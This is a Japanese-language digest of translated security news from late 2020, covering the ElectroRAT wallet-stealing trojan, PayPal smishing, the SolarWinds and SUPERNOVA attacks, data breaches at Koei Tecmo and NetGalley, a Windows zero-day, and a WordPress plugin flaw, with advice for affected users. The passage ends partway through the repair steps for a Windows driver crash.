クロスプラットフォームのElectroRATマルウェアは暗号通貨のウォレットを空にする 
 BleepingComputer : News>Security(2021/01/05) 
 セキュリティ研究者は、数千人のWindows, Linux, macOSユーザの暗号通貨ウォレットを空にするために使用されている新しいリモートアクセス トロイ(RAT)を発見した。
 12月に発見されElectroRATと名付けられたこのクロスプラットフォームRATマルウェアは、Go言語で書かれており、2020年初頭以来、暗号通貨ユーザをターゲットにした作戦の一部として使用されている。
一年に数千人が感染している 
 
 ElectroRAT作戦の背後にいる攻撃者は、このRATを作成し、カスタムElectron(【訳注】 旧称: Atom-Shell。Atomエディタを開発するために生まれたクロスプラットフォームデスクトップアプリケーションエンジン(Qiitaより))アプリケーション中に挿入した。このRATは、暗号通貨取引管理ツール(JammやeTrade)のように表示及び動作する、また、暗号通貨ポーカーアプリケーション(DaoPoker)のように動作するものもある。
 犠牲者のコンピュータ上で起動すると、これらのアプリケーションは、悪意あるElectroRATバックグラウンドプロセスから、犠牲者の注意をそらすために設計されたユーザインターフェイスを前面に表示する。
 今週はじめBleepingComputerとシェアした
Intezerのレポート によると、潜在的な犠牲者を誘惑するために、この脅威のアクターはソーシャルメディア(Twitter、Telegram)や専用のオンラインフォーラム(bitcointalk、SteemCoinPan)でトロイの木馬化したアプリケーションを宣伝している。
 この悪意あるアプリケーションは、2020年1月から12月の間に数千の犠牲者によってダウンロードされ、コマンドアンドコントロールサーバ(C2)アドレスを取得するために、このマルウェアによって使用されたPatebin(【訳注】 ユーザーがソースコードのサンプルなどのテキストを公開するために使われているWebアプリケーション(Wikipediaより))ページの一つでのアクセス回数は、年間におよそ6500回になっている。
 「このトロイ化されたアプリケーションとElectroRATバイナリは、記述の時点で、VirusTotalでは、検出率は低いか、完全に未検出かのいずれかである」とIntezerは発言している。
 感染すると、このマルウェアのオペレータによって、犠牲者のウォレットは空にされる。一部の犠牲者は、この危険なアプリケーションを他の人に警告している。
既製品からカスタムマルウェアに 
 ElectroRAT C2情報をアップロードした同じユーザによって公開されたC2 Pastebinページは、この攻撃者が既成の
Amedey と
KPOT 情報を盗むトロイも利用していることも示している。
 どちらのスティーラーもWindowsプラットフォームのみを標的にしており、感染後も殆ど検出されないようにしている著名なトロイである。
 この新しいGo言語ベースで未検出のElectronRATマルウェアは、同様の能力を持ち複数のプラットフォームををターゲットにすることが可能なので、ステルス作戦には大変効果的である。
 ElectroRATは、Windows, Linux, macOSの亜種に共通する多くの機能を詰め合わせている(「キーロガー、スクリーンショットの取得、ディスクのファイルのアップロード、ファイルのダウンロード、犠牲者のコンソール上でコマンドを実行することを含む」)ので大変侵略的なマルウェアである。
 「スクラッチから書かれたRATを見ることは、そして、暗号通貨ユーザの個人情報を盗むために使用されたのは大変珍しい」とIntezerは結論している。
 「偽のアプリケーションやWebサイトのような様々なコンポーネントを含み、関連するフォーラムとソーシャルメディアを介してマーケティング/宣伝を行うこのような広汎な標的型キャンペーンを見るのは大変稀である。」
 あなたのコンピュータ上でトロイ化されたJamm, eTrade, DaoPokerアプリケーションをダウンロードし起動したのであれば、即座にこれらのプロセスを終了させ(Kill)し、システムから全ての関連するファイルを完全に削除しなさい。
 あなたの暗号通貨ウォレットが未だ空っぽになっていないのであれば、即座に全ての財産を新しいウォレットに移動させ、可能な限り早く全てのパスワードを変更しなさい。
 Intezerはまた、インメモリアーティファクトであらゆるElectornRATの検出を支援する
YARAルール (【訳注】 マルウェアの研究者たちのために作られた、マルウェアを検知・解析・分類するための、オープンソースのプログラム(SIOSセキュリティブログより))も提供している。
 12月、Intezerはまた、
自己拡散能力を持つGo言語ベースの別のマルウェア を発見している。このマルウェアは、WindowsとLinuxサーバでXMRig暗号通貨採掘者(マイナー)を配備するために使用されている。
注意: PayPalフィッシング テキストは、あなたのアカウントは'limited'(制限されている)と述べている 
 BleepingComputer : News>Security(2020/12/31) 
 PayPalテキストメッセージ フィッシングキャンペーンが進行中であり、あなたのアカウント認証や、なりすまし犯罪に使用することのできる他の重要な情報を盗もうとしている。
 Paypalが、疑わしい、もしくは、不正な行動をアカウント上で検出したとき、そのアカウントのステータスは、一時的に金銭の引き出し、送金、受取が制限される'limited'に設定されていた。
 新しいSMSテキストフィッシング(Smishing、【訳注】 スミッシングとはSMSを用いたフィッシング詐欺(Wikipediaより))キャンペーンは、PayPalからであると装っており、リンクをクリックしてアカウントを確認した場合を除き、あなたのアカウントは永久に制限されると述べている。
 "PayPal: We've permanently limited your account, please click link below to verify,"(PayPal: 我々は永久的にあなたのアカウントを制限した。確認するには、以下のリンクをクリックしなさい)と、スミッシング テキストは表示している。
 以下に示したように、囲みの中にあるリンクをクリックすると、フィッシングページに飛ばされアカウントにログインするよう促される。
 フィッシングページにログインすると、入力されたPayPal認証は脅威のアクターに送信される。このフィッシングページは、更に次のステップに進み、あなたの名前、誕生日、住所、口座情報などを含む詳細を収集しようとする。
 収集された情報は、あなたの他の口座へのアクセスを獲得したり、標的型スピアフィッシング攻撃を実行するための、なりすまし攻撃を実行するために使用される。
 昨日、私の知り合いの二人が、このようなフィッシングテキストを受け取った。これは大変活動的なキャンペーンなので、誰もがこれらのメッセージに注意する必要がある。
 スミッシング詐欺は、人気あるものとして増加中なので、リンクを含むあらゆるテキストメッセージを疑わしいものとして処理することは常に重要である。全てのフィッシングeMail同様に、疑わしいリンクをクリックするのではなく、必ず、そのメインサイトのドメインを訪問し、あなたのアカウントに問題があるか否か確認しなさい。
このリンクに情報を入力した場合、何をすべきか 
 このテキストメッセージを受取、誤ってPayPalアカウントにログインしたり、他の情報を提供した場合は、直ちにPaypal.comに行きパスワードを変更しなさい。
 他のサイトでも同じパスワードを使用している場合には、そこも同様にパスワードを変更しなさい。
 最後に、提出したデータを使用した別の標的型スピアフィッシングに注意しなさい。BleepingComputerは、クレジットレポートを監視し、不正な口座があなたの名前で作成されていないことを確認するように提案する。
 なりすまし詐欺を防ぐには、
クレジットレポートを一時的に凍結 して、銀行や他の会社があなたの名前でクレジットを発行するのを防ぐこともできる。
SolarWindsハッカーは、Microsoftのソースコードにアクセスしていた 
 BleepingComputer : News>Security(2020/12/31) 
 SolarWinds攻撃の背後にいる脅威のアクターは、Microsoft製品のソースコードを閲覧できる内部Microsofstアカウントをセキュリティ侵害していた可能性がある。
 今月始め、Microsoftは、彼らの環境中で
SolarWinds Orionプラットフォーム サプライチェーン攻撃 の間にダウンロードされた
悪意ある実行可能ファイルを検出したことを確認した 。
 本日公開されたブログへの投稿で、Microsoftは、プロダクションサービスや顧客データが漏洩していた(
偽造されたSAMLトークン (【訳注】 Security Assertion Markup Language)はService ProviderとIdentity Provider の 2 つの企業間の行われる認証と許可のための XML ベースのフレームワーク(Auth0より))が彼らのドメインに対して使用されていた、あるいは、彼らのシステムが顧客を攻撃するために使用されていた)という証拠は発見されなかったと述べていた。
 しかしながら、Microsoftの調査は、この攻撃が内部Microsoftアカウントをセキュリティ侵害でき,
 そのアカウントでMicrosoftのソフトウェアのソースコードを閲覧するために使用できる可能性を発見した。しかし、この攻撃者は、あらゆるソースコードやエンジニアリングシステムを改竄するために要求されるパーミッションを所有していない。
 「我々は、少数の内部アカウントで尋常でない行動を検出した、検証したところ、あるアカウントが、幾つかのソースコード リポジトリ中のソースコードを閲覧するために使用されていたことを発見した。このアカウントは、いかなるコードもエンジニアリングシステムも改竄するためのパーミッションを所有していなかった。我々のさらなる調査は、いかなる変更も実行されていないことを確認した。これらのアカウントは調査され、正しく設定された」と、Microsoftは
ブログポストで述べている 。
 Microsoftは更に、セキュリティ上からの難読化は実行しないと、ソースコードの閲覧をセキュリティリスクと考えていないと述べている。
Adobeは、Windows 10でFlash Playerをアンインストールするように警告を開始 
 BleepingComputer : News>Security(2020/12/30) 
 Flash Playerは明日(12/31)公式に終焉を迎える。Adobeは、ユーザがFlash PlayerをアンインストールするようWindowsコンピュータで警告を表示することを開始した。
 Flash Playerがインストールされるとき、以下のコマンドを実行する'Adobe Flash Player PPAPI Notifier'と名付けられたスケジュールタスクが作成される。
"C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_465_pepper.exe" -update pepperplugin 
 このコマンドが実行されると、このコマンドは、Adobe Flash Playerへの謝辞を述べ、次に、終焉が迫っているのでこのプログラムをアンインストールするように推奨する警告を現在表示している。
 あなたがコンピュータ上で積極的にFlashコンテンツを使用している場合を除き、Flash Playerを、動作しなくなるまで待つのではなく、直ちに削除するように強く推奨する。
 Flash Playerは常時セキュリティリスクがあったが、
Adobeが2017年にAdobe Flashの終焉をアナウンス して以来、殆どのサイトと内部アプリケーションはAdobe Flashから立ち去っている。
Flash Playerの設定によって制御されているAdobe Alert 
 今年Adobeは、アンインストール推奨アラートを表示しないようにすることを可能にする'EOLUninstallDisable'と呼ばれる
新しいFlash Player設定オプションを導入した 。
"EOLUninstallDisable = [ 0, 1] (0 = false, 1 = true) 
 EOLUninstallDisableのDefault値は 0 である。これはアンインストール推奨アラートを表示する。この値を 1 に設定すると、Flash Playerのアンインストールを求めるAdobeのおせっかいなプロンプトは表示されなくなる。
 Adobe Flash Playerは明日(12/31)終焉を迎える。Flashコンテンツは、この設定の如何を問わず2021年01月12日に動作しなくなる。
 今まで述べてきたように、マシン上でFlashコンテンツを使用しないのであれば、避けられないことをわざわざ遅らせる必要はない、直ちにFlash PLayerをアンインストールしなさい。
【訳者補足】Flash Player と Shockwave Player のアンインストール方法に関しては
こちら 。
SolarWinds: 新しいSUPERNOVAマルウェアに関するアドバイザリをアップデート 
 BleepingComputer : News>Security(2020/12/26) 
 SolarWindsは、この企業のネットワーク マネージメント プラットフォームを介して拡散する更に追加されたSuperNovaマルウェアに関するアドバイザリのアップデート版をリリースした。
 今月始め、SolarWindsは、脅威のアクターが、正当なSolarWinds Orion 
SolarWinds.Orion.Core.BusinessLayer.dll  DLLファイルを、悪意あるSUNBURSTバックドアを含むように改竄した
サイバー攻撃で被害を受けた ことを明らかにした。次に、このファイルは、サプライチェーン攻撃中で自動アップデート機能を介してSolarWindsの顧客に拡散した。
 SolarWindsセキュリティ侵害を解析した後、
Palo Alto Unit 42 と
Microsoft は、
App_Web_logoimagehandler.ashx.b6031896.dll DLLファイルを使用して拡散する
SuperNovaと名付けられた更に追加されたマルウェア をレポートした。このマルウェアは、ハッカーが、このマルウェアによってコンパイルされたC#コードを遠隔から送信し、犠牲者のマシン上で実行することを可能にする。
 MicrosoftとPalo Alto Unit 42は、この更に追加されたマルウェアは、最初のSolarWindsサプライチェーン攻撃の一部であったSUNBURSTトロイを拡散させたグループとの関係性はないと確信している。
SolarWindsはアップデート版のアドバイザリをリリースした 
 火曜日、SolarWindsは、SUPERNOVAマルウェアに関する情報と、SolarWinds Orionネットワーク マネージメント プラットフォームがこれを拡散した方法に関する情報を含むアップデートされたアドバイザリをリリースした。
 「SUPERNOVAマルウェアは、2つのコンポーネントで構成されていた。一つは悪意あるもので、SolarWinds Orion Platform上で使用できるように特別に記述された未署名のWebシェル .dll(“app_web_logoimagehandler.ashx.b6031896.dll”)であった。2つめは、悪意あるコードの拡散を可能にするためにOrion Platform中の脆弱性を悪用するものである。Orion Platform中のこの脆弱性は、最新のアップデートで修正された」と、SolarWindsの
アップデート版アドバイザリ は説明している。
 SolarWindsは、SUNBURST脆弱性だけでなくSUPERNOVAマルウェアからも防御するために、全てのOrion Platformの顧客に対し最新のバージョンへのアップグレードを勧告している。
 このアップデートは現在、以下のバージョンとパッチを含むOrion Platform用に提供されている。
・ 2019.4 HF 6 (2020/12/14にリリース) 
 既に2020.2.1 HF 2や2019.4 HF 6バージョンにアップグレードしている顧客は、SUNBURSTとSUPERNOVA脆弱性は解決されているので、更なるアクションは要求されない。
コーエイテクモ(Koei Tecmo)は、ハッカーが盗み出したデータをリークした後に、データ漏洩を公開した 
 BleepingComputer : News>Security(2020/12/26) 
 日本のゲーム開発会社コーエイテクモは、盗まれたデータがハッカーフォーラムに投稿された後に、データの漏洩を公開し、ヨーロッパとアメリカのWebサイトをオフラインにした。
 コーエイテクモは、仁王2、ゼルダ無双・厄災の目次録、ライザのアトリエ、Dead or Aliveなどを含む人気あるPCとコンソール ゲームで知られている。
 12月20日、脅威のアクターは、従業員に送信したスピアフィッシングを介して、12月18日にkoeitecmoeurope.com Webサイトをハッキングしたと主張した。この攻撃の一部として、65,000のユーザがいるフォーラムデータベースを盗み、アクセスを継続させるためにこのサイト上にWebシェル(【訳注】Web経由でのコマンド実行を可能にするバックドアの一種(トレンドマイクロ・セキュリティプログより) )を植え付けたと、この攻撃者は主張している。
 「私が発見したこのシェルにはFTP証明書が存在している、そして、このシェル並びに、彼らが所有するTwitterアカウント用の複数のTwitterシークレットを購入するのであれば、これらを喜んで共有するだろう」と、この脅威のアクターは、セールストークの中で述べている。
  ハッカーフォーラムでの投稿で、この脅威のアクターは、フォーラムデータを0.05Bitcoin(約1,300$)、Webシェルアクセスを0.25Bitcoin(約6,500$)で販売しようとしていた。
  12月23日、同じ脅威のアクターは、同じハッカーフォーラムにおいてデータベースを無料でリークした。
 BleepingComputerが確認したこのデータベースのサンプルは、フォーラムメンバーのeMailアドレス、IPアドレス、ハッシュされたパスワードとソルト、ユーザ名、誕生日、国名を含んでいる。
コーエイテクモはWebサイトをオフラインにした 
 データがリークの通報を受けた後、コーエイテクモはアメリカ(https://www.koeitecmoamerica.com/)とヨーロッパ(koeitecmoeurope.com)のWebサイトをオフラインにし、以下のメッセージを表示している。
 
当Webサイトへの外部攻撃の可能性に伴い、この問題を調査している間、当該Webサイトを一時的に閉鎖いたします。 
 攻撃を認識して以来、コーエイテクモは、英国子会社(以下、KTE)Webサイト上のフォーラムがセキュリティ侵害され、盗まれたデータがオンライン上にリークされたとするデータ漏洩アドバイザリをリリースした。
 「KTEの運営するホームページ中のコンテンツである「Forum」に登録されたユーザー情報、約65,000 件が流出している可能性があると判断しております。詳細には、ユーザー情報のうち、「任意のアカウント名」と、「パスワード(暗号化された状態)」、「メールアドレス」が、ハッキングにより流出した可能性があると認識しております」とコーエイテクモはデータ漏洩アドバイザリ(英国子会社における情報流出に関するお知らせ(第2報))で表明している。
 コーエイテクモは、影響を受けたのはフォーラムだけであり、このサイトの他の部分は影響を受けていないと述べている。コーエイテクモはまた、金融情報はこのデータベース中に格納されていないとも発言している。
 このゲーム企業は、「身代金要求型マルウェアの可能性は低い」と判断しており、当社並びにKTEへの要求行為、脅迫行為などは確認できていないとしている。
 このゲーム企業は、「身代金要求型マルウェアの可能性は低い」と判断しており、当社並びにKTEへの要求行為、脅迫行為などは確認できていないとしている。
 コーエーテクモは、十分な注意を払い、この攻撃の調査中に英国子会社KTEを内部ネットワークから切り離した。
 コーエーテクモは、今年サイバー攻撃を受けた最初のゲーム開発者ではない。
 今年の初め、
CrytekとUbisoftはEgregorランサムウェアに見舞われ 、
Capcomは、RagnarLockerランサムウェア攻撃 を受けて1TBのデータが盗まれている。
不完全な修正であったためWindows 0-Dayは依然として残っている 
 ThreatPost: Security News(2020/12/24) 
 Microsoftの不適切なパッチのために、デスクトップを完全に乗っ取ることのできる深刻度-重要に分類されるWindowsの0-Dayの危険性は、依然として残っている。
 Windows 8.1とWindows 10(CVE-2020-0986)中のローカル特権昇格のバグはPrint Spooler API中に存在している。6月に発行された
Microsoftのアドバイザリ によると、この問題は、ローカル(【訳者補注】権限でログオンした)攻撃者が特権を昇格し、現在のユーザ コンテキストでコードを実行することを可能にするものである。攻撃者は最初にシステムにログオンする必要があり、次に、影響を受けたシステムの制御を取得するために特別に細工されたアプリケーションを実行することができる。
 「Windows カーネルがメモリ内のオブジェクトの適切な処理に失敗した場合に発生する」と「攻撃者によりこの脆弱性が悪用された場合、カーネル モードで任意のコードが実行される可能性がある。攻撃者は、その後、プログラムのインストール、データの表示、変更、削除などを行ったり、完全なユーザー権限を持つ新たなアカウントを作成したりする可能性がある」と、Microsoftは発言している。
 このバグは、CVSS脆弱性深刻度分類で8.3(最大値10)と評価されている。
 より技術的な観点からは、「この特定のフローは、ユーザモード プリンタドライバー ホストプロセスsplwow64.exe中に存在している」と、「この問題は、ユーザーが指定した値をポインターとして逆参照する前に、それが適切に検証されていないことが原因である」と、昨年12月にMicrosoftにバグを報告したTrend MicroのZero Day Initiative (ZDI)の
アドバイザリ は述べている。
 この問題は、6ヶ月間未パッチのままであった。その間にも、Kasperskyは、5月にオンライン上でこの脆弱性がInternet Explorer中のリモートコード実行の0-Dayのバグを使用したエクスプロイト チェーンの一部として韓国の企業に対して
悪用されていた ことを観察している。Operation Powerfallと呼ばれるこの作戦は、
Darkhotelとして知られる advanced persistent threat (APT、持続的標的型攻撃)として開始されたと思われていた。
 Microsoftの6月のアップデートは、「Windows カーネルがメモリ内のオブジェクトを処理する方法を修正することによって、この脆弱性を解決する」とするパッチを含んでいた。しかしながら、Google Project Zeroの研究者Maddie Stoneは、この修正は不完全であったことを現在公開している(この問題の警告後、90日の猶予期間中に再パッチが失敗したので)。
 「Microsoftは6月にパッチをリリースしたが、このパッチは、この脆弱性を修正していない」と、「9月(90日の猶予期間内)に、酷い修正であることをレポートしたが、この問題は依然として修正されていない」と、水曜日に
彼女はツイート している。
 更に、「この問題の源は、攻撃者が、memcpy関数(【訳注】 指定バイト数分のメモリをコピーする関数)へのsrc(コピー元のメモリブロックのポインタ)とdest(コピー先のメモリブロックのポインタ)のポインタを制御することを可能にする任意のポインタ逆参照であった。この’修正’は、単純にこのポインターにオフセットを付けるように変更しただけだったので、memcpy関数の引数を制御することは依然として可能である」と、彼女は追加している。
 Microsoftは新しいCVE(
CVE-2020-17008 )を発行した。そして、研究者達は1月のパッチに期待している。その一方で、Project Zeroは、この問題に関する
概念の実証コード(proof-of-concept code)を公開 した。
NetGalley(ネットギャリー)は、Webサイトがハッキングされデータが漏洩したことを発表した 
 BleepingComputer : News>Security(2020/12/24) 
 NetGalley書籍宣伝サイトは、脅威のアクターがメンバーの情報の存在するデータベースにアクセす可能なデータ漏洩を被っていた。
 NetGalleyは、著者と出版社が彼らの書籍(ゲラ)の電子批評コピーを書籍の支持者、影響力のある読者、業界の専門家にプロモートし、読者にその書籍を推奨することを期待するWebサイトである。
 12月21日(月)、NetGalleyのWebサイトは、ハッキングされ汚損された。さらなる調査の後、脅威のアクターが、メンバーのデータを含むこのサイトのデータベースのバックアップにアクセスしていたことも判明した。
 「我々は、12月21日(月)、NetGalleyがデータセキュリティ重大事案の犠牲者になったことを皆様に通知することを大変残念に思う。当初、我々のホームページは単純な汚損であると思われたが、更なる調査で、NetGalleyデータベースのバックアップファイルへの非認証・非合法アクセスと結論付けられた」と、NetGalleyは
データ漏洩アドバイザリ で公開した。
 このバックアップデータベースは、NetGalleyメンバーの個人情報(ログイン名、パスワード、名前、eMailアドレス)を含んでいる。このデータベースに存在している可能性のある他のオプショナル情報には、ユーザのメールアドレス、誕生日、企業名、Kindle eMailアドレスが含まれる。
 NetGalleyは、このデータベース中には金融情報は存在していないと述べている。データ漏洩の対応において、NetGalleyは、全てのユーザに、次回ログインしたときにパスワードを変更するよう要求している。
 BleepingComputerは、NetGalleyにパスワードがデータベース中でハッシュされていたか否か問い合わせたが、回答はなかった。
NetGAlleyユーザが実行すべきこと 
 NetGalleyのメンバーであるのなら、直ぐにサイトにログインしパスワードを変更しなさい。
 他のサイトでもNetGalleyのパスワードを使い回しているのであれば、そのパスワードをそのサイト用の一意で強力なパスワードに変更しなさい。
 全てのサイトで一意のパスワードを使用することは、あるサイトでデータ漏洩があっても、あなたが使用している他のサイトが影響を受けることを妨げることになる。
 全てのサイトでの一意で堅牢なパスワードを記録する手助けとして、パスワードマネージャを使用することを推奨する。
SolarWindsハッカーは、米国財務省当局者のeMailアカウントを晒した 
 BleepingComputer : News>Security(2020/12/22) 
 米国上院議員Ron Wydenは、多くの米国財務省eMailアカウントがSolarWindsハックの背後にいる脅威のアクターによって晒されたと発言した。
 この声明は、米国財務省並びに米国内国歳入庁(IRS)がSolarWindsサプライチェーン攻撃に関して委員会のスタッフにブリーフィングした後に発表された。
 IRS自体や納税者のデータが、現在進行しているハッキングキャンペーンの一部としてセキュリティ侵害されたという証拠は存在していないが、この上院議員は「財務省へのハッキングは重大であるように思われる」と発言している。
多くのの財務省eMailアカウントが晒された 
 「財務省のスタッフによると、財務省は7月以降、深刻なセキュリティ侵害に見舞われたが、その詳細は不明である」と「Microsoftは、多数のeMailアカウントが漏洩したと財務省に通知した」と、上院財政委員会のメンバーであるWydenは
発言 している。
 この上院議員はまた、SolarWindsのハッカーが、米国財務省の部門別オフィース(「その省の最高位にランクされる」部門)のシステムもセキュリティ侵害していたと追加している。
 「財務省は依然として、ハッカーが実行したアクションのすべてを、厳密には、どのような情報が盗まれたのかを認識していない」とWydenは付け加えている。
 財務省秘書官Steven Mnuchinもまた、財務省がハッキングされたことに関して質問されたとき、機密システムがセキュリティ侵害された証拠は未だ発見されていないと、
CNBC (【訳注】 ニュース通信社ダウ・ジョーンズとアメリカの大手テレビネットワークのひとつNBCが共同設立したニュース専門放送局(Wikipediaより))に告げていた。
 「幸いなことにダメージはなく、多大な情報が移動されたことも確認されなかったと告げるだろう」と、Mnuchinは発言していた。
 
最後に、数年に渡り、政府関係者が暗号バックドアを主張し、暗号化キーはハッカーにとって魅力的なターゲットであると発言したサイバーセキュリティのエキスパートの警告を無視し続けた後、連邦政府は現在、練達のハッカーに連邦政府サーバから暗号化キーを盗まれたと思われるセキュリティ侵害を被った
。 上院議員Ron Wyden 
SolarWindsの犠牲者の数は徐々に増えている 
 SolarWindsサプライチェーンセキュリティ侵害 が発見された後、
FireEye , 
Microsoft , 
VMware を含む複数の組織は、ハッカーによって侵害されたことを公開した。
 Microsoftは、
40を超える彼らの顧客のネットワークが、現在進行中のこの一連の攻撃で侵害された ことを発見している。その80%は米国であり、44%はIT部門である。
 しかし、FireEyeだけは、この攻撃の第二段階のターゲットにされ、この攻撃(
UNC2452 としてFireEyeに、
Dark Halo としてVolexityに追跡されている)を指揮している脅威のアクターによってシステムから情報を盗まれた。
 フォーレンシック(【訳注】 セキュリティ事故発生時に原因究明などのためにコンピュータに残された証拠を調査すること(NRI Secureより))エビデンスの調査に従い、新しい情報が明らかになるたびに、SolarWindsハックで攻撃された組織の既知のリストは、徐々に増加している。
 現時点で、ネットワークが侵害されたことを確認した米国の州および政府機関は以下を含んでいる。
 セキュリティ研究者とサイバーセキュリティは、このマルウェアのドメイン生成アルゴリズムをクラックした後、週末に渡って幾つかの
SolarWinds犠牲者リスト を共有した。
ハッカーは、27万Ledger暗号通貨Walletユーザから盗んだeMailとメールアドレスを公開した 
 Threatpost : News(2020/12/22) 
・ Ladgerハードウェアウォレットの詳細は、スカマーにとって絶好の機会を提供する。 
 Ladger仮想通貨ハードウェアウォレットの27万を超える顧客の電話番号、eMail、郵便宛先は、ハッキングフォーラムから無料でダウンロード可能になっていた。
 Ladgerニュースレターを購読している100万を超える人々のeMailアドレスが付属しているこの情報は、元々は
2020年6月に 、この企業がセキュリティ侵害されたことにより犯罪者の手に落ちたと信じられている。
 当初は、犯罪者によって人気のある地下ハッキングフォーラムで販売されていたが、現在、このデータは無料で利用可能である。
 そして必然的に、多くの悪意あるパーティーが、不注意な人々を欺き、Ladger顧客から脅し取ることを企てるために、この情報を悪用しようとする可能性があることを意味している。
 このような攻撃は、既に定期的に発生している。
 例えば、今月始め、Bleeping Computerは、Ledgerの顧客がLedger Liveソフトウェアの新しいバージョンをインストールし、彼らのPINをリセットする必要があるとする漏洩情報eMailを受け取っていると
レポート している。
 しかし、見た目と違い、このeMailは実際にLedgerから来たものではなく、疑うことを知らないユーザをウォレットユーザのリカバリフレーズとシークレットパスフレーズ(セキュリティ レイヤーを有効にしている場合には)を盗むためのWindows用のLedger Liveのインチキ バージョンに差し向けるためにサイバー犯罪者によって送信されたものである。
 このような情報で、攻撃者は、ユーザの暗号通貨ファンドへの完全なアクセスを取得することができる。
 本日、Ledgerは、この企業のサーバーから漏洩した情報を使用して受信者のhomeに侵入しない条件として、攻撃者が身代金500$を要求していることを確認したとする他のスカムに関する
警告を顧客に行った 。
 
 記述している時点で、Ledgerは、ここ2ヶ月で171のフィッシングサイトをシャットダウンしたと発言している。Ledger顧客ベースに関連するデータが自由に利用可能になっていることから、ユーザをターゲットにしているフィッシングサイトの数は増えるばかりである。
 Ledgerは、この企業を装うインチキの通信を受け取ったユーザは、
それを彼らにレポートする ように依頼している。
 Ledgerは、ユーザのデバイスを決して非アクティブにすることはない(疑いを持たないユーザーに不適切な決定を下すように欺くような脅威を実行するフィッシング攻撃は珍しいものではない)と、この企業が、テキストメッセージや電話で顧客に接触することは決してないと強調している。
 しかし、おそらく最も重要なことは、ユーザーはリカバリフレーズの24語を「いかなる状況でも誰とでも」共有してはならないとLedgerが述べていることである。 シークレットリカバリフレーズは、Ledgerのデバイス自体でのみ入力する必要がある。さもなければ、あなたが保持している暗号通貨は、あなたの指をすり抜ける可能性がある。
500万WordPressサイトが、攻撃にオープンになっているContact Form 7プラグインを実行している 
 Threatpost : News(2020/12/18) 
 Contact Form 7と呼ばれる人気のあるWordPressのプラグインのパッチが火曜日にリリースされた。このパッチは、認証されていない敵が、このプラグインを実行しているWebサイトを乗っ取る、もしくは、そのサイトをホストしているサーバ全体をハイジャックすることを可能にする緊急のバグを修正している。
このパッチ は、Contact Form 7プラグインのアップデート バージョン5.3.2の形式で出現している。
 このWordPressユーティリティは、500万Webサイトでアクティブであり、それらのサイトの大部分(
70% )は、バージョン5.3.1及び、それ以前のContact Form7プラグインを実行している。
 この緊急の脆弱性(
CVE-2020-35489 )は、
この脆弱性を水曜日に発見したAstra Security Reserch によると、unrestricted file upload bug(無制限ファイルアップロードのバグ)に分類されている。
素早い修正 
 Astraによると、「このプラグインの開発者(
Takayuki Miyoshi )は、その重大な性質を理解し、この脆弱性を素早く修正した。我々は、あらゆる脆弱性攻撃を防ぐために可能な限り早急にアップデートをリリースることを試みるために相互にコミュニケーションを取り合った。この問題を修正するアップデートは、バージョン5.3.2として既にリリースされている。」
 このフローを特定したとされるバグハンター
Jinson Varghese は、この脆弱性は認証されていないユーザがContact Form 7の全てのフォーム ファイルタイプ制限をバイパスすることを可能にしており、バージョン5.3.1及び、それ以前のプラグインを実行しているサイトに対して実行可能形式のバイナリをアップロードすることができると記述している。
 次に、この敵は、多くの悪意ある行為(Webサイトを書き換えたり、訪問者をサードパーティのWebサイトにリダイレクトし、訪問者に個人情報や財務情報を渡すように企てる)を実行することができる。
 研究者によると、ターゲットにされたWebサイトを乗っ取ることに加えて、WordPressのインスタンスをホストしているサーバーでコンテナ化が行なわれておらずWebサイトを分離していない場合には、攻撃者はまた、そのサイトをホストしているサーバーをハイジャックすることもできる。
悪用のしやすさ 
 「これは、簡単に悪用できる。そして、攻撃者は認証される必要はなく、攻撃はリモートで実行することができる」と、Astraのディジタル マーケティング担当者でありグロースハッカー(【訳注】 ユーザーから得た製品やサービスについてのデータを分析し、改善してマーケティングの課題を解決していく職種(ferretより))Naman RastogiはThreatpostのe-Mailインタビューで発言している。
 彼は、Contact Form 7のアップデートは、現在リリースされていると発言している。「WordPressプラグインを自動アップデートにしているユーザは、自動的にアップデートされる。それ以外の人々は、積極的に手動アップデートすることが要求される」と、彼はThreatpostに告げている。
 このバグ関する展望に関して、Webアナリスト企業Netcraftは、今WordPressプラットフォームを使用しているWebサイトは4億5500万存在していると見積もっている。これは、WordPressサイトの1.09%が、このフローを介しての攻撃に対して脆弱性があることを示唆している。
Windows 10 Updateが、CorsairVBusDriver BSODクラッシュループを発生 
 BleepingComputer : News>Security(2020/12/18) 
 Microsoftの2020年12月のWindows 10アップデートは、Corsair Utility Engineソフトウェアとコンフリクトし、オペレーティングシステムをBSOD(Blue Screen of Deth、死のブルースクリーン)クラッシュループを発生させている。
 2020年12月のパッチの水曜日にアップデートがリリースされた後、Windows 10のユーザは、オペレーティングシステムがクラッシュループ(Windowsが再起動、自動的にクラッシュ、再び再起動)するとする報告を開始した。
 Windows 10がクラッシュすると、以下の画像に見られるように"Stop code - SYSTEM THREAD EXCEPTION NOT HANDLED"エラーとCorsairVBusDriver.sys drive failedと記したブルースクリーンを表示する。
 Microsoftは、最新のWindows 10アップデートに関する、如何なるサポート速報でもこのコンフリクトを認識していないが、まもなくWindows 10アップデートのセーフガードを発動することを、我々は期待している。
 人々は、12月8日以来CorsairVBusDriver.sysクラッシュに関して不平を言い続けているが、本日、BleepingComputerは影響を受ける人が急増していることを確認した。MicrosoftがCorsairドライバに関するオプショナル アップデートを提供しているが、これは、我々が確認している急増の説明をつける可能性があるので、
このドライバはインストールするな 。
 BleepingComputerは、これらクラッシュに関するいくつかの質問をMicrosoftにしている。
Windows 10 CorsairVBusDriver.sys BSODクラッシュの修正方法 
 このクラッシュの影響を受けたのであれば、Windowsをブートすることはできなくなる。それ故、我々はWindows 10回復環境(Recovery Environment)を使用してコンフリクトしているCorsairVBusDriver.sysをリネームもしくは削除する必要がある。
方法1、 回復環境(Recovery Environment)でCorsairVBusDriver.sysドライバをリネームする 
 CorsairVBusDriver.sysクラッシュを修正する最も簡単な方法はWindows 10を回復環境(Recovery Environment)でブートし、このドライバをリネームすることである。
 CorsairVBusDriver.sysドライバをリネームするには、以下のステップに従いなさい。
1 、 Windows 10をリカバリ スクリーンで起動する(ブート方法は
こちら (リンクはMicrosoftの日本語サイトに変更)を参照、但し、「スタートアップ設定」ではなく「コマンドプロンプト」を選択する)。【訳注】 ブート情報や詳細な画像が必要な方は、
こちら や
こちら を参照してください。
2 、 「その他の修復オプション」をクリック
3 、 「トラブルシュート」をクリック
4 、 「詳細オプション」をクリック
5 、 「コマンドプロンプト」をクリック
6 、 コマンドプロンプトで、
diskpart とタイプし、Enterを押す
7 、 
